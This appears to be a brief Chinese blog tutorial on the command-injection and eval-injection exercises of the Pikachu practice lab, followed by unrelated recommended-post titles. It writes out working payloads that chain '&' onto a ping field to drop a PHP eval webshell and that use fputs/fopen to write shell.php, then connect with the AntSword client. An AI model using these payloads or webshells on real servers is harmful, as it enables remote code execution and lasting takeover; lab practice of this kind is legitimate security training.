Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
IMPYLH13 小时前
Linux 的 chmod 命令
linux·运维·服务器
北京智和信通13 小时前
面向超融合的全域监控与一体化运维方案
运维·网管软件·超融合监控·超融合运维
艾莉丝努力练剑13 小时前
【MYSQL】MYSQL学习的一大重点:数据库基础
linux·运维·服务器·数据库·c++·学习·mysql
会喷火才能叫火山13 小时前
本地搭建AI相关步骤
linux·运维·ai·centos
The Open Group13 小时前
TOGAF®如何平衡创新与合规——金融机构的架构治理之道
运维·安全·架构
小周学学学14 小时前
vmware的python自动化:批量给esxi主机挂载iscsi动态目标
运维·自动化·vmware·虚拟化
勤劳的执着的运维农民工14 小时前
使用ubnt protect chime门铃有感
运维·笔记
H_老邪14 小时前
什么是 devOps?Jenkins ?云效工作台?
运维·devops
杨云龙UP14 小时前
Oracle DG / ADG日常巡检操作指南
linux·运维·服务器·数据库·ubuntu·oracle
乾元14 小时前
安全官(CISO)的困惑:AI 投入产出比(ROI)的衡量
网络·人工智能·安全·网络安全·chatgpt·架构·安全架构